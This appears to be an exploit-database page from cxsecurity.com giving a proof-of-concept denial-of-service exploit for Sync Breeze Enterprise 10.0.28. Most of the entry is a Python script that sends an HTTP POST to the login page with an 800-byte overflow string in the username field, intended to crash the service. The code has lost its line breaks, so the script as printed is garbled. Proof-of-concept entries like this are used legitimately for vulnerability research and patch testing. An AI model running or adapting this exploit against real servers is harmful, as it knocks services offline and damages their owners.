Sync Breeze Enterprise 10.0.28 Denial of-Service (PoC)

2020.06.16
Credit: Anon
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python import socket import sys try: server = sys.argv[1] port = 80 size = 800 inputBuffer = b"A" * size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode() + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += b"Accept-Language: en-US,en;q=0.5\r\n" buffer += b"Referer: http://10.11.0.22/login\r\n" buffer += b"Connection: close\r\n" buffer += b"Content-Type: application/x-www-form-urlencoded\r\n" buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n" buffer += b"\r\n" buffer += content print("Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server, port)) s.send(buffer) s.close() print("Done!") except socket.error: print("Could not connect!")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top